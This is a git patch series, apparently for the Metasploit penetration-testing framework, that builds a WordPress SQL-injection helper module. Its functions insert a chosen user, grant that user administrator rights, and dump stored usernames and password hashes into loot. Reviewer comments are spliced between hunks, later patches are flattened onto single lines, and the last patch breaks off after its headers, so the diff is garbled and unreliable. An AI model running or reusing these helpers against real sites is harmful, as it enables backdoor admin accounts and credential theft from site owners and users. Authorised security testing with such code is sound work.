From 14f1d6a786ae9f559f7d28c22d686ca1085db04d Mon Sep 17 00:00:00 2001
From: Chocapikk
Date: Wed, 25 Sep 2024 00:33:19 +0200
Subject: [PATCH 01/22] Add Msf::Exploit::Remote::HTTP::Wordpress::SQLi
---
.../exploit/remote/http/wordpress/sqli.rb | 167 ++++++++++++++++++
1 file changed, 167 insertions(+)
create mode 100644 lib/msf/core/exploit/remote/http/wordpress/sqli.rb
diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
new file mode 100644
index 000000000000..2c85e43d120d
--- /dev/null
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
@@ -0,0 +1,167 @@
+module Msf
+ # This module provides reusable SQLi (SQL Injection) helper functions
+ # for WordPress exploits in Metasploit Framework. These functions allow
+ # for actions such as creating new users, granting privileges, and
+ # dumping user credentials via SQL injection vulnerabilities in WordPress.
+ #
+ # Usage:
+ # Include this module in your exploit or auxiliary module and use
+ # the provided functions to simplify SQL injection logic.
+ module Exploit::Remote::HTTP::Wordpress::SQLi
+ include Msf::Exploit::SQLi
+ # Function to initialize the SQLi instance in the mixin.
+ #
+ # This function sets up the SQLi instance that is initialized in the exploit module.
+ # The SQLi instance is passed as a parameter to ensure it is accessible within the mixin
+ # and can be used for executing SQL injection queries.
+ #
+ # @param sqli [Object] The SQLi instance initialized in the exploit module.
+ # @return [void]
+
+ def wordpress_sqli_initialize_sqli(sqli)
+ @sqli = sqli
+ end
+
+ # Inject an user into the WordPress database, creating or updating an entry.
+ #
+ # This method either creates a new user entry in the 'users' table or updates an existing one.
+ # If the user already exists, their password, nicename, email, and display name will be updated.
+ # Otherwise, a new user will be created with the provided credentials and default values.
+ # The password is hashed using MD5 for compatibility with older WordPress versions.
+ #
+ # @param username [String] The username for the new or updated user.
+ # @param password [String] The password for the new user (stored as an MD5 hash).
+ # @param email [String] The email for the new user.
+ # @param table_prefix [String] The prefix of the WordPress database tables.
+ # @return [void]
+ def wordpress_sqli_create_user(username, password, email, table_prefix)
+ user_query = <<-SQL
+ INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
+ SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}'
+ FROM DUAL
+ WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}')
+ LIMIT 1
+ SQL
+
+ update_query = <<-SQL
+ UPDATE #{table_prefix}users
+ SET user_pass = MD5('#{password}'),
+ user_nicename = '#{username}',
+ user_email = '#{email}',
+ display_name = '#{username}'
+ WHERE user_login = '#{username}'
+ SQL
+
+ @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' '))
+ @sqli.raw_run_sql(update_query.strip.gsub(/\s+/, ' '))
+
+ print_status("{WPSQLi} User '#{username}' created or updated successfully.")
+ end
+
+ # Grant admin privileges to the specified user by creating or updating the appropriate meta entry.
+ #
+ # This method either creates a new entry in the 'usermeta' table or updates an existing one
+ # to grant administrator capabilities to the specified user. If the entry for the user's
+ # capabilities already exists, it will be updated to assign administrator privileges.
+ # If the entry does not exist, a new one will be created.
+ #
+ # @param username [String] The username of the user to grant privileges to.
+ # @param table_prefix [String] The prefix of the WordPress database tables.
+ # @return [void]
+ def wordpress_sqli_grant_admin_privileges(username, table_prefix)
+ admin_query = <<-SQL
+ INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value)
+ VALUES (
+ (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'),
+ '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'
+ )
+ ON DUPLICATE KEY UPDATE
+ meta_value = 'a:1:{s:13:"administrator";s:1:"1";}'
+ SQL
+
+ @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' '))
+ print_status("{WPSQLi} Admin privileges granted or updated for user '#{username}'.")
+ end
+
+ # Identify the table prefix for the WordPress installation
+ #
+ # @return [String] The detected table prefix
+ # @raise [Failure::UnexpectedReply] If the table prefix could not be detected
+ def wordpress_sqli_identify_table_prefix
+ default_prefix_check = "SELECT 0 FROM information_schema.tables WHERE table_name = 'wp_users'"
+ result = @sqli.run_sql(default_prefix_check)&.to_i
+
+ if result == 0
+ prefix = 'wp_'
+ print_status("{WPSQLi} Retrieved default table prefix: 'wp_'")
+ else
+ print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...')
+ query = <<-SQL
+ SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix
+ FROM information_schema.tables
+ WHERE table_schema = database()
+ AND table_name LIKE '%\\_users'
+ AND (SELECT COUNT(*)
+ FROM information_schema.columns c
+ WHERE c.table_schema = tables.table_schema
+ AND c.table_name = tables.table_name
+ AND c.column_name IN ('user_login', 'user_pass')
+ ) = 2
+ LIMIT 1
+ SQL
+
+ prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' '))
+ unless prefix && !prefix.strip.empty?
+ print_error('{WPSQLi} Unable to detect the table prefix.')
+ return nil
+ end
+
+ prefix.strip!
+ prefix << '_' unless prefix.end_with?('_')
+ print_status("{WPSQLi} Custom table prefix detected: '#{prefix}'")
+ end
+
+ prefix
+ end
+
+ # Get users' credentials from the wp_users table
+ #
+ # @param table_prefix [String] The prefix of the WordPress database tables
+ # @param count [Integer] The number of users to retrieve (default: 10)
+ # @return [Array] Array of arrays containing user login and password hash
+ def wordpress_sqli_get_users_credentials(table_prefix, count = 10)
+ columns = ['user_login', 'user_pass']
+ data = @sqli.dump_table_fields("#{table_prefix}users", columns, '', count)
+
+ table = Rex::Text::Table.new(
+ 'Header' => 'wp_users',
+ 'Indent' => 4,
+ 'Columns' => columns
+ )
+
+ data.each do |user|
+ table << user
+
+ create_credential({
+ workspace_id: myworkspace_id,
+ origin_type: :service,
+ module_fullname: fullname,
+ username: user[0],
+ private_type: :nonreplayable_hash,
+ jtr_format: Metasploit::Framework::Hashes.identify_hash(user[1]),
+ private_data: user[1],
+ service_name: 'WordPress',
+ address: ip,
+ port: datastore['RPORT'],
+ protocol: 'tcp',
+ status: Metasploit::Model::Login::Status::UNTRIED
+ })
+ end
+
+ print_status('{WPSQLi} Dumped user data:')
+ print_line(table.to_s)
+
+ return data
+ end
+ end
+end
From 3da638e37e3d54d0b33082e2ef5446dd5bc2a38a Mon Sep 17 00:00:00 2001
From: Chocapikk
Date: Wed, 25 Sep 2024 00:58:09 +0200
Subject: [PATCH 02/22] Using dynamic prefix in table
---
lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
index 2c85e43d120d..6019466c1a0e 100644
--- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb
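Review bot: `wordpress_sqli_create_user` and `wordpress_sqli_grant_admin_privileges` interpolate `username`, `password`, `email` and `table_prefix` directly into quoted SQL literals, so a value containing `'` or `\` changes the statement that reaches the database of the system under test instead of being stored as data. These are operator-supplied strings, so I would reject unexpected characters before building the query, e.g. `raise ArgumentError, 'unexpected character in username' unless username.match?(/\A[\w.@-]+\z/)`, with an equivalent check for `table_prefix`, and state the accepted character set in the `@param` lines. Separately, `wordpress_sqli_identify_table_prefix` documents `@raise [Failure::UnexpectedReply]` but its failure path is `print_error` followed by `return nil`; the tag should read `# @return [String, nil] The detected table prefix, or nil if detection failed`, or the method should raise.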
@@ -134,7 +134,7 @@ def wordpress_sqli_get_users_credentials(table_prefix, count = 10) data = @sqli.dump_table_fields("#{table_prefix}users", columns, '', count) table = Rex::Text::Table.new( - 'Header' => 'wp_users', + 'Header' => "#{table_prefix}users", 'Indent' => 4, 'Columns' => columns ) From fa0d54eaf2ded3c7f74c8ae04bb5d5ace235d8f3 Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Wed, 25 Sep 2024 01:00:48 +0200 Subject: [PATCH 03/22] Add Metasploit::Credential::Creation to use create_credential --- .../exploit/remote/http/wordpress/sqli.rb | 60 +++++++++---------- 1 file changed, 30 insertions(+), 30 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 6019466c1a0e..66e717233c5d 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb 
@@ -36,20 +36,20 @@ def wordpress_sqli_initialize_sqli(sqli) # @return [void] def wordpress_sqli_create_user(username, password, email, table_prefix) user_query = <<-SQL - INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) - SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}' - FROM DUAL - WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}') - LIMIT 1 + INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) + SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}' + FROM DUAL + WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}') + LIMIT 1 SQL update_query = <<-SQL - UPDATE #{table_prefix}users - SET user_pass = MD5('#{password}'), - user_nicename = '#{username}', - user_email = '#{email}', - display_name = '#{username}' - WHERE user_login = '#{username}' + UPDATE #{table_prefix}users + SET user_pass = MD5('#{password}'), + user_nicename = '#{username}', + user_email = '#{email}', + display_name = '#{username}' + WHERE user_login = '#{username}' SQL @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' ')) 
@@ -70,13 +70,13 @@ def wordpress_sqli_create_user(username, password, email, table_prefix) # @return [void] def wordpress_sqli_grant_admin_privileges(username, table_prefix) admin_query = <<-SQL - INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) - VALUES ( - (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'), - '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' - ) - ON DUPLICATE KEY UPDATE - meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' + INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) + VALUES ( + (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'), + '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' + ) + ON DUPLICATE KEY UPDATE + meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' SQL @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' ')) @@ -97,17 +97,17 @@ def wordpress_sqli_identify_table_prefix else print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') query = <<-SQL - SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix - FROM information_schema.tables - WHERE table_schema = database() - AND table_name LIKE '%\\_users' - AND (SELECT COUNT(*) - FROM information_schema.columns c - WHERE c.table_schema = tables.table_schema - AND c.table_name = tables.table_name - AND c.column_name IN ('user_login', 'user_pass') - ) = 2 - LIMIT 1 + SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix + FROM information_schema.tables + WHERE table_schema = database() + AND table_name LIKE '%\\_users' + AND (SELECT COUNT(*) + FROM information_schema.columns c + WHERE c.table_schema = tables.table_schema + AND c.table_name = tables.table_name + AND c.column_name IN ('user_login', 'user_pass') + ) = 2 + LIMIT 1 SQL prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' ')) 
@@ -142,7 +142,7 @@ def wordpress_sqli_get_users_credentials(table_prefix, count = 10) data.each do |user| table << user - create_credential({ + Metasploit::Credential::Creation.create_credential({ workspace_id: myworkspace_id, origin_type: :service, module_fullname: fullname, From a1b4106260b25e4aa4134f7d21efdaccf4254dea Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Wed, 25 Sep 2024 01:57:46 +0200 Subject: [PATCH 04/22] Fix wordpress_sqli_get_users_credentials and rename wordpress_sqli_initialize --- .../exploit/remote/http/wordpress/sqli.rb | 78 +++++++++++-------- 1 file changed, 46 insertions(+), 32 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 66e717233c5d..95337043ca81 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -18,7 +18,7 @@ module Exploit::Remote::HTTP::Wordpress::SQLi # @param sqli [Object] The SQLi instance initialized in the exploit module. # @return [void] - def wordpress_sqli_initialize_sqli(sqli) + def wordpress_sqli_initialize(sqli) @sqli = sqli end 
@@ -36,20 +36,20 @@ def wordpress_sqli_initialize_sqli(sqli) # @return [void] def wordpress_sqli_create_user(username, password, email, table_prefix) user_query = <<-SQL - INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) - SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}' - FROM DUAL - WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}') - LIMIT 1 + INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) + SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}' + FROM DUAL + WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}') + LIMIT 1 SQL update_query = <<-SQL - UPDATE #{table_prefix}users - SET user_pass = MD5('#{password}'), - user_nicename = '#{username}', - user_email = '#{email}', - display_name = '#{username}' - WHERE user_login = '#{username}' + UPDATE #{table_prefix}users + SET user_pass = MD5('#{password}'), + user_nicename = '#{username}', + user_email = '#{email}', + display_name = '#{username}' + WHERE user_login = '#{username}' SQL @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' ')) 
@@ -70,13 +70,13 @@ def wordpress_sqli_create_user(username, password, email, table_prefix) # @return [void] def wordpress_sqli_grant_admin_privileges(username, table_prefix) admin_query = <<-SQL - INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) - VALUES ( - (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'), - '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' - ) - ON DUPLICATE KEY UPDATE - meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' + INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) + VALUES ( + (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'), + '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' + ) + ON DUPLICATE KEY UPDATE + meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' SQL @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' ')) @@ -97,17 +97,17 @@ def wordpress_sqli_identify_table_prefix else print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') query = <<-SQL - SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix - FROM information_schema.tables - WHERE table_schema = database() - AND table_name LIKE '%\\_users' - AND (SELECT COUNT(*) - FROM information_schema.columns c - WHERE c.table_schema = tables.table_schema - AND c.table_name = tables.table_name - AND c.column_name IN ('user_login', 'user_pass') - ) = 2 - LIMIT 1 + SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix + FROM information_schema.tables + WHERE table_schema = database() + AND table_name LIKE '%\\_users' + AND (SELECT COUNT(*) + FROM information_schema.columns c + WHERE c.table_schema = tables.table_schema + AND c.table_name = tables.table_name + AND c.column_name IN ('user_login', 'user_pass') + ) = 2 + LIMIT 1 SQL prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' ')) 
@@ -127,9 +127,10 @@ def wordpress_sqli_identify_table_prefix # Get users' credentials from the wp_users table # # @param table_prefix [String] The prefix of the WordPress database tables + # @param ip [String] The target IP address # @param count [Integer] The number of users to retrieve (default: 10) # @return [Array] Array of arrays containing user login and password hash - def wordpress_sqli_get_users_credentials(table_prefix, count = 10) + def wordpress_sqli_get_users_credentials(table_prefix, ip, count = 10) columns = ['user_login', 'user_pass'] data = @sqli.dump_table_fields("#{table_prefix}users", columns, '', count) @@ -139,10 +140,12 @@ def wordpress_sqli_get_users_credentials(table_prefix, count = 10) 'Columns' => columns ) + loot_data = '' data.each do |user| table << user + loot_data << "Username: #{user[0]}, Password Hash: #{user[1]}\n" - Metasploit::Credential::Creation.create_credential({ + create_credential({ workspace_id: myworkspace_id, origin_type: :service, module_fullname: fullname, @@ -161,6 +164,17 @@ def wordpress_sqli_get_users_credentials(table_prefix, count = 10) print_status('{WPSQLi} Dumped user data:') print_line(table.to_s) + loot_path = store_loot( + 'wordpress.users', + 'text/plain', + ip, + loot_data, + 'wp_users.txt', + 'WordPress Usernames and Password Hashes' + ) + + print_good("Loot saved to: #{loot_path}") + return data end end From 2d6862ccd4a1f9de760e60ee4c2fe889c8d59c89 Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Wed, 25 Sep 2024 03:57:17 +0200 Subject: [PATCH 05/22] Add recommendations --- .../exploit/remote/http/wordpress/sqli.rb | 110 ++++++++---------- 1 file changed, 50 insertions(+), 60 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 95337043ca81..e8701ddc62b6 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb 
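Review bot: `store_loot` in the last hunk runs unconditionally, so a dump that returns no rows still writes an empty `wp_users.txt` loot entry and prints "Loot saved". The `data.each` loop in the hunk above it also assumes `dump_table_fields` never returns nil, which is not visible here and worth confirming. I would bail out before the table is built with `return data if data.nil? || data.empty?`. The new `print_good("Loot saved to: #{loot_path}")` also drops the `{WPSQLi}` prefix that the other messages in this file carry. The method body begins outside these hunks.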
@@ -20,6 +20,7 @@ module Exploit::Remote::HTTP::Wordpress::SQLi def wordpress_sqli_initialize(sqli) @sqli = sqli + @prefix = wordpress_sqli_identify_table_prefix end # Inject an user into the WordPress database, creating or updating an entry. 
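Review bot: `@prefix` is assigned whatever `wordpress_sqli_identify_table_prefix` returns, and that method's failure path is `return nil`, so a failed detection is cached silently and the later `"#{@prefix}users"` interpolations resolve to the bare table name `users`. I would stop at this point instead, e.g. `fail_with(Failure::UnexpectedReply, 'Unable to detect the WordPress table prefix') unless @prefix`, which also matches the `@raise [Failure::UnexpectedReply]` tag already written on that method. The docstring above `wordpress_sqli_initialize` still describes it as only storing the SQLi instance; it should say that the call now sends the prefix-detection queries to the target and caches the result.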
@@ -32,28 +33,24 @@ def wordpress_sqli_initialize(sqli) # @param username [String] The username for the new or updated user. # @param password [String] The password for the new user (stored as an MD5 hash). # @param email [String] The email for the new user. - # @param table_prefix [String] The prefix of the WordPress database tables. # @return [void] - def wordpress_sqli_create_user(username, password, email, table_prefix) - user_query = <<-SQL - INSERT INTO #{table_prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) - SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', NOW(), 0, '#{username}' - FROM DUAL - WHERE NOT EXISTS (SELECT 1 FROM #{table_prefix}users WHERE user_login = '#{username}') - LIMIT 1 + def wordpress_sqli_create_user(username, password, email) + query = <<-SQL + INSERT INTO #{@prefix}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) + SELECT '#{username}', MD5('#{password}'), '#{username}', '#{email}', user_registered, user_status, '#{username}' + FROM #{@prefix}users + WHERE NOT EXISTS ( + SELECT 1 FROM #{@prefix}users WHERE user_login = '#{username}' + ) + LIMIT 1 + ON DUPLICATE KEY UPDATE + user_pass = MD5('#{password}'), + user_nicename = '#{username}', + user_email = '#{email}', + display_name = '#{username}' SQL - update_query = <<-SQL - UPDATE #{table_prefix}users - SET user_pass = MD5('#{password}'), - user_nicename = '#{username}', - user_email = '#{email}', - display_name = '#{username}' - WHERE user_login = '#{username}' - SQL - - @sqli.raw_run_sql(user_query.strip.gsub(/\s+/, ' ')) - @sqli.raw_run_sql(update_query.strip.gsub(/\s+/, ' ')) + @sqli.raw_run_sql(query.strip.gsub(/\s+/, ' ')) print_status("{WPSQLi} User '#{username}' created or updated successfully.") end 
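Review bot: The merged statement cannot take the update path that the docstring and the status message still promise: when `user_login` already exists, the `WHERE NOT EXISTS (...)` filter makes the `SELECT` return no rows, so there is no candidate row for `ON DUPLICATE KEY UPDATE` to act on. Whether that clause could fire at all also depends on a unique key covering `user_login`, which is not visible here. The new `SELECT` additionally copies `user_registered` and `user_status` from an arbitrary existing row rather than the `NOW(), 0` used by the previous revision. Either keep the separate `UPDATE` from the earlier revision, or make the documentation honest with `# Creates the user only if no row with this user_login exists; an existing user is left unchanged.` and reword the message, which is printed without checking any result.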
@@ -66,17 +63,15 @@ def wordpress_sqli_create_user(username, password, email, table_prefix) # If the entry does not exist, a new one will be created. # # @param username [String] The username of the user to grant privileges to. - # @param table_prefix [String] The prefix of the WordPress database tables. # @return [void] - def wordpress_sqli_grant_admin_privileges(username, table_prefix) + def wordpress_sqli_grant_admin_privileges(username) admin_query = <<-SQL - INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) - VALUES ( - (SELECT ID FROM #{table_prefix}users WHERE user_login = '#{username}'), - '#{table_prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' - ) - ON DUPLICATE KEY UPDATE - meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' + INSERT INTO #{@prefix}usermeta (user_id, meta_key, meta_value) + SELECT ID, '#{@prefix}capabilities', 'a:1:{s:13:"administrator";s:1:"1";}' + FROM #{@prefix}users + WHERE user_login = '#{username}' + ON DUPLICATE KEY UPDATE + meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' SQL @sqli.raw_run_sql(admin_query.strip.gsub(/\s+/, ' ')) 
@@ -92,50 +87,45 @@ def wordpress_sqli_identify_table_prefix result = @sqli.run_sql(default_prefix_check)&.to_i if result == 0 - prefix = 'wp_' print_status("{WPSQLi} Retrieved default table prefix: 'wp_'") - else - print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') - query = <<-SQL - SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix - FROM information_schema.tables - WHERE table_schema = database() - AND table_name LIKE '%\\_users' - AND (SELECT COUNT(*) - FROM information_schema.columns c - WHERE c.table_schema = tables.table_schema - AND c.table_name = tables.table_name - AND c.column_name IN ('user_login', 'user_pass') - ) = 2 - LIMIT 1 - SQL - - prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' ')) - unless prefix && !prefix.strip.empty? - print_error('{WPSQLi} Unable to detect the table prefix.') - return nil - end - - prefix.strip! - prefix << '_' unless prefix.end_with?('_') - print_status("{WPSQLi} Custom table prefix detected: '#{prefix}'") + return 'wp_' + end + print_status('{WPSQLi} Default prefix not found, attempting to detect custom table prefix...') + query = <<-SQL + SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) AS prefix + FROM information_schema.tables + WHERE table_schema = database() + AND table_name LIKE '%\\_users' + AND (SELECT COUNT(*) + FROM information_schema.columns c + WHERE c.table_schema = tables.table_schema + AND c.table_name = tables.table_name + AND c.column_name IN ('user_login', 'user_pass') + ) = 2 + LIMIT 1 + SQL + + prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' ')) + unless prefix && !prefix.strip.empty? 
+ print_error('{WPSQLi} Unable to detect the table prefix.') + return nil end + print_status("{WPSQLi} Custom table prefix detected: '#{prefix}'") + prefix end # Get users' credentials from the wp_users table # - # @param table_prefix [String] The prefix of the WordPress database tables - # @param ip [String] The target IP address # @param count [Integer] The number of users to retrieve (default: 10) # @return [Array] Array of arrays containing user login and password hash - def wordpress_sqli_get_users_credentials(table_prefix, ip, count = 10) + def wordpress_sqli_get_users_credentials(count = 10) columns = ['user_login', 'user_pass'] - data = @sqli.dump_table_fields("#{table_prefix}users", columns, '', count) + data = @sqli.dump_table_fields("#{@prefix}users", columns, '', count) table = Rex::Text::Table.new( - 'Header' => "#{table_prefix}users", + 'Header' => "#{@prefix}users", 'Indent' => 4, 'Columns' => columns ) @@ -154,7 +144,7 @@ def wordpress_sqli_get_users_credentials(table_prefix, ip, count = 10) jtr_format: Metasploit::Framework::Hashes.identify_hash(user[1]), private_data: user[1], service_name: 'WordPress', - address: ip, + address: datastore['RHOST'], port: datastore['RPORT'], protocol: 'tcp', status: Metasploit::Model::Login::Status::UNTRIED From a5d9a06b9ae4a7b5b682eda1ad078aaaae1e3708 Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Wed, 25 Sep 2024 04:43:27 +0200 Subject: [PATCH 06/22] Fix with datastore['RHOST'] --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index e8701ddc62b6..501a941a574b 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb 
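Review bot: The emptiness check tests `prefix.strip.empty?`, but the value that is logged and returned is no longer stripped, because this hunk drops `prefix.strip!` together with the trailing-underscore normalisation. A reply padded with whitespace or a newline passes the check and then ends up inside every table name built from `@prefix`. Normalising once before the check keeps the two in step: `prefix = @sqli.run_sql(query.strip.gsub(/\s+/, ' ')).to_s.strip` followed by `if prefix.empty?`. The method's signature and the start of its body lie outside this hunk.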
@@ -9,6 +9,7 @@ module Msf # the provided functions to simplify SQL injection logic. module Exploit::Remote::HTTP::Wordpress::SQLi include Msf::Exploit::SQLi + # Function to initialize the SQLi instance in the mixin. # # This function sets up the SQLi instance that is initialized in the exploit module. @@ -17,7 +18,6 @@ module Exploit::Remote::HTTP::Wordpress::SQLi # # @param sqli [Object] The SQLi instance initialized in the exploit module. # @return [void] - def wordpress_sqli_initialize(sqli) @sqli = sqli @prefix = wordpress_sqli_identify_table_prefix @@ -157,7 +157,7 @@ def wordpress_sqli_get_users_credentials(count = 10) loot_path = store_loot( 'wordpress.users', 'text/plain', - ip, + datastore['RHOST'], loot_data, 'wp_users.txt', 'WordPress Usernames and Password Hashes' From 0409d4ec9cfb079d8734909aaa5a29f1a07911cd Mon Sep 17 00:00:00 2001 From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 25 Sep 2024 16:38:36 +0200 Subject: [PATCH 07/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Julien Voisin --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 501a941a574b..1d7ae1a247b8 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -50,7 +50,7 @@ def wordpress_sqli_create_user(username, password, email) display_name = '#{username}' SQL - @sqli.raw_run_sql(query.strip.gsub(/\s+/, ' ')) + @sqli.raw_run_sql(query.strip.gsub(/\n/, ' ').gsub(/\s+/, ' ')) print_status("{WPSQLi} User '#{username}' created or updated successfully.") end From 22443b53d6ce4bc9f78e78f9d2458896f97754fd Mon Sep 17 00:00:00 2001 
From: Valentin Lobstein <88535377+Chocapikk@users.noreply.github.com> Date: Wed, 25 Sep 2024 16:39:09 +0200 Subject: [PATCH 08/22] Update lib/msf/core/exploit/remote/http/wordpress/sqli.rb Co-authored-by: Julien Voisin --- lib/msf/core/exploit/remote/http/wordpress/sqli.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index 1d7ae1a247b8..b971e112cabb 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb @@ -83,10 +83,11 @@ def wordpress_sqli_grant_admin_privileges(username) # @return [String] The detected table prefix # @raise [Failure::UnexpectedReply] If the table prefix could not be detected def wordpress_sqli_identify_table_prefix - default_prefix_check = "SELECT 0 FROM information_schema.tables WHERE table_name = 'wp_users'" + indicator = rand() + default_prefix_check = "SELECT #{indicator} FROM information_schema.tables WHERE table_name = 'wp_users'" result = @sqli.run_sql(default_prefix_check)&.to_i - if result == 0 + if result == indicator print_status("{WPSQLi} Retrieved default table prefix: 'wp_'") return 'wp_' end From 1e95cba5f268414de174e2763bc686cfa8bc6b5e Mon Sep 17 00:00:00 2001 From: Chocapikk Date: Wed, 25 Sep 2024 18:55:26 +0200 Subject: [PATCH 09/22] Randomize values --- .../exploit/remote/http/wordpress/sqli.rb | 28 ++++++++++--------- 1 file changed, 15 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb index b971e112cabb..2d2cb6a0f97a 100644 --- a/lib/msf/core/exploit/remote/http/wordpress/sqli.rb +++ b/lib/msf/core/exploit/remote/http/wordpress/sqli.rb 
